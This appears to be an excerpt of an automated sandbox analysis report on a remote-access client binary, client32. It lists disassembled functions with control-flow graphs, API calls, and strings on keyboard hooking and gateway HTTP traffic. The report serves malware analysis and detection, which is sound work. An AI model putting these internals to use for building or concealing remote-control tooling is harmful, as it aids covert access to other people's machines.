                                                                                                                                                    • Instruction Fuzzy Hash: B1C1EF75E4127A9BEB22CF918C94FEDF7B9BB48308F8044E9E559A7240D6706E80CB51
                                                                                                                                                    Function 11142010 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 266libraryregistryloaderCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2614 11142010-11142051 call 11147060 2617 11142057-111420b3 LoadLibraryA 2614->2617 2618 111420d9-11142103 call 11143a50 call 11147af0 LoadLibraryA 2614->2618 2620 111420b5-111420c0 call 11017a40 2617->2620 2621 111420c7-111420d0 2617->2621 2630 11142105-1114210b 2618->2630 2631 11142133 2618->2631 2620->2621 2627 111420c2 call 110ccc90 2620->2627 2621->2618 2623 111420d2-111420d3 FreeLibrary 2621->2623 2623->2618 2627->2621 2630->2631 2633 1114210d-11142113 2630->2633 2632 1114213d-1114215d GetClassInfoExA 2631->2632 2634 11142163-1114218a call 11162be0 call 11145080 2632->2634 2635 111421fe-11142256 2632->2635 2633->2631 2636 11142115-11142131 call 1105e820 2633->2636 2645 111421a3-111421e5 call 11145080 call 111450b0 LoadCursorA GetStockObject RegisterClassExA 2634->2645 2646 1114218c-111421a0 call 11029a70 2634->2646 2647 11142292-11142298 2635->2647 2648 11142258-1114225e 2635->2648 2636->2632 2645->2635 2673 111421e7-111421fb call 11029a70 2645->2673 2646->2645 2652 111422d4-111422f6 call 1105e820 2647->2652 2653 1114229a-111422a9 call 111101b0 2647->2653 2648->2647 2650 11142260-11142266 2648->2650 2650->2647 2656 11142268-1114227f call 1112d770 LoadLibraryA 2650->2656 2665 11142304-11142309 2652->2665 2666 111422f8-11142302 2652->2666 2663 111422cd 2653->2663 2664 111422ab-111422cb 2653->2664 2656->2647 2672 11142281-1114228d GetProcAddress 2656->2672 2669 111422cf 2663->2669 2664->2669 2670 11142315-1114231b 2665->2670 2671 1114230b 2665->2671 2666->2670 2669->2652 2675 1114231d-11142323 call 110f8230 2670->2675 2676 11142328-11142341 call 1113d9a0 2670->2676 2671->2670 2672->2647 2673->2635 2675->2676 2682 11142347-1114234d 2676->2682 2683 111423e9-111423fa 2676->2683 2684 1114234f-11142361 call 111101b0 2682->2684 2685 11142389-1114238f 2682->2685 2695 11142363-11142379 call 1115e590 2684->2695 2696 1114237b 2684->2696 2687 111423b5-111423c1 2685->2687 2688 11142391-11142397 2685->2688 2689 111423c3-111423c9 2687->2689 2690 111423d8-111423e3 #17 LoadLibraryA 2687->2690 2692 1114239e-111423b0 SetTimer 2688->2692 2693 11142399 call 11135840 2688->2693 2689->2690 2694 111423cb-111423d1 2689->2694 2690->2683 2692->2687 2693->2692 2694->2690 2698 111423d3 call 1112e5e0 2694->2698 2700 1114237d-11142384 2695->2700 2696->2700 2698->2690 2700->2685
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(User32.dll,00000000,?), ref: 11142063
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 111420D3
                                                                                                                                                    • LoadLibraryA.KERNEL32(imm32,?,?,00000000,?), ref: 111420F6
                                                                                                                                                    • GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 11142155
                                                                                                                                                    • _memset.LIBCMT ref: 11142169
                                                                                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 111421B9
                                                                                                                                                    • GetStockObject.GDI32(00000000), ref: 111421C3
                                                                                                                                                    • RegisterClassExA.USER32(?), ref: 111421DA
                                                                                                                                                    • LoadLibraryA.KERNEL32(pcihooks,?,?,00000000,?), ref: 11142272
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 11142287
                                                                                                                                                    • SetTimer.USER32(00000000,00000000,000003E8,1113D980), ref: 111423AA
                                                                                                                                                    • #17.COMCTL32(?,?,?,00000000,?), ref: 111423D8
                                                                                                                                                    • LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000000,?), ref: 111423E3
                                                                                                                                                      • Part of subcall function 11017A40: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,1EF76653,11030346,00000000), ref: 11017A6E
                                                                                                                                                      • Part of subcall function 11017A40: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 11017A7E
                                                                                                                                                      • Part of subcall function 11017A40: GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 11017AC2
                                                                                                                                                      • Part of subcall function 11017A40: FreeLibrary.KERNEL32(00000000), ref: 11017AE8
                                                                                                                                                      • Part of subcall function 110CCC90: CreateWindowExA.USER32(00000000,button,11195264,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000000,00000000), ref: 110CCCC9
                                                                                                                                                      • Part of subcall function 110CCC90: SetClassLongA.USER32(00000000,000000E8,110CCA10), ref: 110CCCE0
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Library$Load$Class$AddressCreateFreeProc$CursorEventInfoLongObjectRegisterStockTimerWindow_memset
                                                                                                                                                    • String ID: *quiet$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$TraceCopyData$UI.CPP$User32.dll$View$_License$_debug$imm32$pcihooks$riched32.dll
                                                                                                                                                    • API String ID: 3706574701-3145203681
                                                                                                                                                    • Opcode ID: c8cd067e95ed8df30712ab26ad1b5c3d5f0c1ca3db4a3fb2271c70030aa03097
                                                                                                                                                    • Instruction ID: dd3f645cf5ef2db3b7f5f54c26e54504db449fd0c20b07bc67f1527c65be20eb
                                                                                                                                                    • Opcode Fuzzy Hash: c8cd067e95ed8df30712ab26ad1b5c3d5f0c1ca3db4a3fb2271c70030aa03097
                                                                                                                                                    • Instruction Fuzzy Hash: F8A18CB8E02266DFDB01DFE5D9C4AA9FBB4BB0870CF60453EE125A7648E7305484CB55
                                                                                                                                                    Function 6CA863C0 Relevance: 47.4, APIs: 24, Strings: 3, Instructions: 181libraryloadersleepCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2703 6ca863c0-6ca86402 call 6caa4710 EnterCriticalSection InterlockedDecrement 2706 6ca86408-6ca8641f EnterCriticalSection 2703->2706 2707 6ca865ed-6ca86608 LeaveCriticalSection call 6caa28e1 2703->2707 2709 6ca864da-6ca864e0 2706->2709 2710 6ca86425-6ca86431 2706->2710 2714 6ca865bd-6ca865e8 _memset LeaveCriticalSection 2709->2714 2715 6ca864e6-6ca864f0 shutdown 2709->2715 2712 6ca86443-6ca86447 2710->2712 2713 6ca86433-6ca86441 GetProcAddress 2710->2713 2716 6ca86449-6ca8644c 2712->2716 2717 6ca8644e-6ca86450 SetLastError 2712->2717 2713->2712 2714->2707 2718 6ca8650a-6ca8652d timeGetTime #16 2715->2718 2719 6ca864f2-6ca86507 GetLastError call 6ca830a0 2715->2719 2723 6ca86456-6ca86465 2716->2723 2717->2723 2721 6ca8656c-6ca8656e 2718->2721 2722 6ca8652f 2718->2722 2719->2718 2729 6ca86570-6ca8657b closesocket 2721->2729 2727 6ca86551-6ca8656a #16 2722->2727 2728 6ca86531 2722->2728 2724 6ca86477-6ca8647b 2723->2724 2725 6ca86467-6ca86475 GetProcAddress 2723->2725 2731 6ca8647d-6ca86480 2724->2731 2732 6ca86482-6ca86484 SetLastError 2724->2732 2725->2724 2727->2721 2727->2722 2728->2727 2733 6ca86533-6ca8653e GetLastError 2728->2733 2734 6ca8657d-6ca8658a WSAGetLastError 2729->2734 2735 6ca865b6 2729->2735 2736 6ca8648a-6ca86499 2731->2736 2732->2736 2733->2721 2737 6ca86540-6ca86547 timeGetTime 2733->2737 2738 6ca8658c-6ca8658e Sleep 2734->2738 2739 6ca86594-6ca86598 2734->2739 2735->2714 2741 6ca864ab-6ca864af 2736->2741 2742 6ca8649b-6ca864a9 GetProcAddress 2736->2742 2737->2721 2743 6ca86549-6ca8654b Sleep 2737->2743 2738->2739 2739->2729 2744 6ca8659a-6ca8659c 2739->2744 2745 6ca864b1-6ca864be 2741->2745 2746 6ca864c3-6ca864d5 SetLastError 2741->2746 2742->2741 2743->2727 2744->2735 2747 6ca8659e-6ca865b3 GetLastError call 6ca830a0 2744->2747 2745->2714 2746->2714 2747->2735
                                                                                                                                                    APIs
                                                                                                                                                    • EnterCriticalSection.KERNEL32(6CACB898,00000000,?,00000000,?,6CA8D77B,00000000), ref: 6CA863E8
                                                                                                                                                    • InterlockedDecrement.KERNEL32(-0003F3B7), ref: 6CA863FA
                                                                                                                                                    • EnterCriticalSection.KERNEL32(-0003F3CF,?,00000000,?,6CA8D77B,00000000), ref: 6CA86412
                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6CA8643B
                                                                                                                                                    • SetLastError.KERNEL32(00000078,?,00000000,?,6CA8D77B,00000000), ref: 6CA86450
                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6CA8646F
                                                                                                                                                    • SetLastError.KERNEL32(00000078,?,00000000,?,6CA8D77B,00000000), ref: 6CA86484
                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6CA864A3
                                                                                                                                                    • SetLastError.KERNEL32(00000078,?,00000000,?,6CA8D77B,00000000), ref: 6CA864C5
                                                                                                                                                    • shutdown.WSOCK32(?,00000001,?,00000000,?,6CA8D77B,00000000), ref: 6CA864E9
                                                                                                                                                    • GetLastError.KERNEL32(?,00000001,?,00000000,?,6CA8D77B,00000000), ref: 6CA864F2
                                                                                                                                                    • timeGetTime.WINMM(?,00000001,?,00000000,?,6CA8D77B,00000000), ref: 6CA86510
                                                                                                                                                    • #16.WSOCK32(?,?,00001000,00000000,?,00000000,?,6CA8D77B,00000000), ref: 6CA86526
                                                                                                                                                    • GetLastError.KERNEL32(?,?,00001000,00000000,?,00000000,?,6CA8D77B,00000000), ref: 6CA86533
                                                                                                                                                    • timeGetTime.WINMM(?,00000000,?,6CA8D77B,00000000), ref: 6CA86540
                                                                                                                                                    • Sleep.KERNEL32(00000001,?,00000000,?,6CA8D77B,00000000), ref: 6CA8654B
                                                                                                                                                    • #16.WSOCK32(?,?,00001000,00000000,?,?,00001000,00000000,?,00000000,?,6CA8D77B,00000000), ref: 6CA86563
                                                                                                                                                    • closesocket.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6CA8D77B,00000000), ref: 6CA86574
                                                                                                                                                    • WSAGetLastError.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6CA8D77B,00000000), ref: 6CA8657D
                                                                                                                                                    • Sleep.KERNEL32(00000032,?,?,?,00001000,00000000,?,00000000,?,6CA8D77B,00000000), ref: 6CA8658E
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00001000,00000000,?,00000000,?,6CA8D77B,00000000), ref: 6CA8659E
                                                                                                                                                    • _memset.LIBCMT ref: 6CA865C8
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,6CA8D77B,00000000), ref: 6CA865D7
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6CACB898,?,00000000,?,6CA8D77B,00000000), ref: 6CA865F2
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$CriticalSection$AddressProc$EnterLeaveSleepTimetime$DecrementInterlocked_memsetclosesocketshutdown
                                                                                                                                                    • String ID: CloseGatewayConnection - closesocket(%u) FAILED (%d)$CloseGatewayConnection - shutdown(%u) FAILED (%d)$InternetCloseHandle
                                                                                                                                                    • API String ID: 3764039262-2631155478
                                                                                                                                                    • Opcode ID: bd97d6cdf9e956285510274407e2df1370b516f15b21c1af1560d31f83f5b264
                                                                                                                                                    • Instruction ID: 6e664d649e1dfdc7e8f45af5640b95755924380e2662ac14ea352e21ea1d2235
                                                                                                                                                    • Opcode Fuzzy Hash: bd97d6cdf9e956285510274407e2df1370b516f15b21c1af1560d31f83f5b264
                                                                                                                                                    • Instruction Fuzzy Hash: F751D2B1701301AFE7089F68C988B5A73B8BF49318F114514E506D7B80EB70E9CACB61
                                                                                                                                                    Function 6CA898D0 Relevance: 45.8, APIs: 15, Strings: 11, Instructions: 346COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2751 6ca898d0-6ca89932 2752 6ca89934-6ca89955 call 6ca830a0 call 6caa28e1 2751->2752 2753 6ca89956-6ca8995e 2751->2753 2755 6ca89964-6ca89979 _strncmp 2753->2755 2756 6ca89ac5-6ca89acc 2753->2756 2755->2756 2758 6ca8997f-6ca89994 call 6caa4330 2755->2758 2759 6ca89b19-6ca89b1d 2756->2759 2760 6ca89ace-6ca89adb 2756->2760 2758->2756 2773 6ca8999a-6ca899af _strncmp 2758->2773 2761 6ca89b4b-6ca89b70 GetTickCount InterlockedExchange EnterCriticalSection 2759->2761 2762 6ca89b1f-6ca89b26 2759->2762 2765 6ca89af8-6ca89b07 wsprintfA 2760->2765 2766 6ca89add-6ca89af6 wsprintfA 2760->2766 2770 6ca89b9c-6ca89ba1 2761->2770 2771 6ca89b72-6ca89b9b LeaveCriticalSection call 6ca830a0 call 6caa28e1 2761->2771 2762->2761 2769 6ca89b28-6ca89b41 call 6ca877b0 2762->2769 2768 6ca89b0a-6ca89b16 call 6ca852b0 2765->2768 2766->2768 2768->2759 2769->2761 2790 6ca89b43-6ca89b45 2769->2790 2774 6ca89bfb-6ca89c05 2770->2774 2775 6ca89ba3-6ca89bd0 call 6ca84dd0 2770->2775 2773->2756 2779 6ca899b5-6ca899f1 2773->2779 2782 6ca89c3b-6ca89c47 2774->2782 2783 6ca89c07-6ca89c17 2774->2783 2797 6ca89d4b-6ca89d6c LeaveCriticalSection call 6ca977e0 2775->2797 2798 6ca89bd6-6ca89bf6 WSAGetLastError call 6ca830a0 2775->2798 2786 6ca899f7-6ca899ff 2779->2786 2792 6ca89c50-6ca89c5a 2782->2792 2788 6ca89c19-6ca89c1d 2783->2788 2789 6ca89c20-6ca89c22 2783->2789 2795 6ca89aa3-6ca89ac2 call 6ca830a0 2786->2795 2796 6ca89a05-6ca89a08 2786->2796 2788->2789 2799 6ca89c1f 2788->2799 2789->2782 2800 6ca89c24-6ca89c36 call 6ca846c0 2789->2800 2790->2761 2793 6ca89d2e-6ca89d3b call 6ca830a0 2792->2793 2794 6ca89c60-6ca89c65 2792->2794 2818 6ca89d45 2793->2818 2803 6ca89c71-6ca89c9a send 2794->2803 2804 6ca89c67-6ca89c6b 2794->2804 2795->2756 2806 6ca89a0a-6ca89a0c 2796->2806 2807 6ca89a0e 2796->2807 2821 6ca89d78-6ca89d8a call 6caa28e1 2797->2821 2822 6ca89d6e-6ca89d72 InterlockedIncrement 2797->2822 2798->2797 2799->2789 2800->2782 2812 6ca89c9c-6ca89c9f 2803->2812 2813 6ca89cf1-6ca89d0f call 6ca830a0 2803->2813 2804->2793 2804->2803 2815 6ca89a14-6ca89a1d 2806->2815 2807->2815 2819 6ca89cbe-6ca89cce WSAGetLastError 2812->2819 2820 6ca89ca1-6ca89cac 2812->2820 2813->2818 2823 6ca89a8d-6ca89a8e 2815->2823 2824 6ca89a1f-6ca89a22 2815->2824 2818->2797 2827 6ca89cd0-6ca89ce9 timeGetTime Sleep 2819->2827 2828 6ca89d11-6ca89d2c call 6ca830a0 2819->2828 2820->2818 2826 6ca89cb2-6ca89cbc 2820->2826 2822->2821 2823->2795 2830 6ca89a24 2824->2830 2831 6ca89a26-6ca89a35 2824->2831 2826->2827 2827->2792 2833 6ca89cef 2827->2833 2828->2818 2830->2831 2835 6ca89a90-6ca89a93 2831->2835 2836 6ca89a37-6ca89a3a 2831->2836 2833->2818 2838 6ca89a9d 2835->2838 2839 6ca89a3c 2836->2839 2840 6ca89a3e-6ca89a4d 2836->2840 2838->2795 2839->2840 2842 6ca89a4f-6ca89a52 2840->2842 2843 6ca89a95-6ca89a98 2840->2843 2844 6ca89a54 2842->2844 2845 6ca89a56-6ca89a65 2842->2845 2843->2838 2844->2845 2846 6ca89a9a 2845->2846 2847 6ca89a67-6ca89a6a 2845->2847 2846->2838 2848 6ca89a6c 2847->2848 2849 6ca89a6e-6ca89a85 2847->2849 2848->2849 2849->2786 2850 6ca89a8b 2849->2850 2850->2795
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _strncmp
                                                                                                                                                    • String ID: %02x %02x$%s$3'$CMD=NC_DATA$Error %d sending HTTP request on connection %d$Error %d writing inet request on connection %d$Error send returned 0 on connection %d$NC_DATA$SendHttpReq failed, not connected to gateway!$abort send, gateway hungup$xx %02x
                                                                                                                                                    • API String ID: 909875538-2848211065
                                                                                                                                                    • Opcode ID: a4703cc2b44a8790c6ab90629fef6d2189b2f25b1015b4c413de6fa007ab9c3b
                                                                                                                                                    • Instruction ID: 727875143ba0d5cc1b7694af69af70550f76265b2e55d1adcce86211825f6440
                                                                                                                                                    • Opcode Fuzzy Hash: a4703cc2b44a8790c6ab90629fef6d2189b2f25b1015b4c413de6fa007ab9c3b
                                                                                                                                                    • Instruction Fuzzy Hash: D2D103B1A062199FDB20CF74CA84BE9B7B4AF0A308F1841D9D90D9B641D735DACACF51
                                                                                                                                                    Function 11028C10 Relevance: 42.5, APIs: 2, Strings: 22, Instructions: 542COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2851 11028c10-11028c2d 2852 11028c33-11028c62 2851->2852 2853 110292f8-110292ff 2851->2853 2856 11028cf0-11028d38 GetModuleFileNameA call 111640b0 call 11164ead 2852->2856 2857 11028c68-11028c6e 2852->2857 2854 11029311-11029315 2853->2854 2855 11029301-1102930a 2853->2855 2859 11029317-11029329 call 11162bb7 2854->2859 2860 1102932a-1102933e call 11162bb7 2854->2860 2855->2854 2858 1102930c 2855->2858 2872 11028d3d 2856->2872 2862 11028c70-11028c78 2857->2862 2858->2854 2862->2862 2863 11028c7a-11028c80 2862->2863 2867 11028c83-11028c88 2863->2867 2867->2867 2871 11028c8a-11028c94 2867->2871 2874 11028cb1-11028cb7 2871->2874 2875 11028c96-11028c9d 2871->2875 2873 11028d40-11028d4a 2872->2873 2876 11028d50-11028d53 2873->2876 2877 110292ef-110292f7 2873->2877 2879 11028cb8-11028cbe 2874->2879 2878 11028ca0-11028ca6 2875->2878 2876->2877 2880 11028d59-11028d67 call 11026ef0 2876->2880 2877->2853 2878->2878 2881 11028ca8-11028cae 2878->2881 2879->2879 2882 11028cc0-11028cee call 11164ead 2879->2882 2887 11029275-1102928a call 11164c77 2880->2887 2888 11028d6d-11028d80 call 11163ca7 2880->2888 2881->2874 2882->2873 2887->2877 2895 11029290-110292ea 2887->2895 2893 11028d82-11028d85 2888->2893 2894 11028d8b-11028db3 call 11026d60 call 11026ef0 2888->2894 2893->2887 2893->2894 2894->2887 2900 11028db9-11028dd6 call 11026fe0 call 11026ef0 2894->2900 2895->2877 2905 110291e5-110291ec 2900->2905 2906 11028ddc 2900->2906 2908 11029212-11029219 2905->2908 2909 110291ee-110291f1 2905->2909 2907 11028de0-11028e00 call 11026d60 2906->2907 2919 11028e02-11028e05 2907->2919 2920 11028e36-11028e39 2907->2920 2911 11029231-11029238 2908->2911 2912 1102921b-11029221 2908->2912 2909->2908 2910 110291f3-110291fa 2909->2910 2914 11029200-11029210 2910->2914 2916 1102923a-11029245 2911->2916 2917 11029248-1102924f 2911->2917 2915 11029227-1102922f 2912->2915 2914->2908 2914->2914 2915->2911 2915->2915 2916->2917 2921 11029251-1102925b 2917->2921 2922 1102925e-11029265 2917->2922 2923 11028e07-11028e0e 2919->2923 2924 11028e1e-11028e21 2919->2924 2926 110291ce-110291df call 11026ef0 2920->2926 2927 11028e3f-11028e52 call 11165010 2920->2927 2921->2922 2922->2887 2925 11029267-11029272 2922->2925 2928 11028e14-11028e1c 2923->2928 2924->2926 2929 11028e27-11028e31 2924->2929 2925->2887 2926->2905 2926->2907 2927->2926 2934 11028e58-11028e74 call 1116558e 2927->2934 2928->2924 2928->2928 2929->2926 2937 11028e76-11028e7c 2934->2937 2938 11028e8f-11028ea5 call 1116558e 2934->2938 2939 11028e80-11028e88 2937->2939 2943 11028ea7-11028ead 2938->2943 2944 11028ebf-11028ed5 call 1116558e 2938->2944 2939->2939 2941 11028e8a 2939->2941 2941->2926 2945 11028eb0-11028eb8 2943->2945 2949 11028ed7-11028edd 2944->2949 2950 11028eef-11028f05 call 1116558e 2944->2950 2945->2945 2947 11028eba 2945->2947 2947->2926 2951 11028ee0-11028ee8 2949->2951 2955 11028f07-11028f0d 2950->2955 2956 11028f1f-11028f35 call 1116558e 2950->2956 2951->2951 2953 11028eea 2951->2953 2953->2926 2957 11028f10-11028f18 2955->2957 2961 11028f37-11028f3d 2956->2961 2962 11028f4f-11028f65 call 1116558e 2956->2962 2957->2957 2959 11028f1a 2957->2959 2959->2926 2963 11028f40-11028f48 2961->2963 2967 11028f67-11028f6d 2962->2967 2968 11028f7f-11028f95 call 1116558e 2962->2968 2963->2963 2966 11028f4a 2963->2966 2966->2926 2969 11028f70-11028f78 2967->2969 2973 11028f97-11028f9d 2968->2973 2974 11028faf-11028fc5 call 1116558e 2968->2974 2969->2969 2971 11028f7a 2969->2971 2971->2926 2975 11028fa0-11028fa8 2973->2975 2979 11028fc7-11028fcd 2974->2979 2980 11028fdf-11028ff5 call 1116558e 2974->2980 2975->2975 2977 11028faa 2975->2977 2977->2926 2982 11028fd0-11028fd8 2979->2982 2985 11028ff7-11028ffd 2980->2985 2986 1102900f-11029025 call 1116558e 2980->2986 2982->2982 2984 11028fda 2982->2984 2984->2926 2987 11029000-11029008 2985->2987 2991 11029027-1102902d 2986->2991 2992 1102903f-11029055 call 1116558e 2986->2992 2987->2987 2989 1102900a 2987->2989 2989->2926 2993 11029030-11029038 2991->2993 2997 11029057-1102905d 2992->2997 2998 1102906f-11029085 call 1116558e 2992->2998 2993->2993 2995 1102903a 2993->2995 2995->2926 2999 11029060-11029068 2997->2999 3003 110290a6-110290bc call 1116558e 2998->3003 3004 11029087-1102908d 2998->3004 2999->2999 3001 1102906a 2999->3001 3001->2926 3009 110290d3-110290e9 call 1116558e 3003->3009 3010 110290be 3003->3010 3005 11029097-1102909f 3004->3005 3005->3005 3007 110290a1 3005->3007 3007->2926 3015 11029100-11029116 call 1116558e 3009->3015 3016 110290eb 3009->3016 3011 110290c4-110290cc 3010->3011 3011->3011 3014 110290ce 3011->3014 3014->2926 3021 11029137-1102914d call 1116558e 3015->3021 3022 11029118-1102911e 3015->3022 3017 110290f1-110290f9 3016->3017 3017->3017 3019 110290fb 3017->3019 3019->2926 3027 1102916f-11029185 call 1116558e 3021->3027 3028 1102914f-1102915f 3021->3028 3023 11029128-11029130 3022->3023 3023->3023 3025 11029132 3023->3025 3025->2926 3033 11029187-1102918d 3027->3033 3034 1102919c-110291b2 call 1116558e 3027->3034 3030 11029160-11029168 3028->3030 3030->3030 3032 1102916a 3030->3032 3032->2926 3035 11029190-11029198 3033->3035 3034->2926 3039 110291b4-110291ba 3034->3039 3035->3035 3037 1102919a 3035->3037 3037->2926 3040 110291c4-110291cc 3039->3040 3040->2926 3040->3040
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,74801370,?,0000001A), ref: 11028CFD
                                                                                                                                                    • _strrchr.LIBCMT ref: 11028D0C
                                                                                                                                                      • Part of subcall function 1116558E: __stricmp_l.LIBCMT ref: 111655CB
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
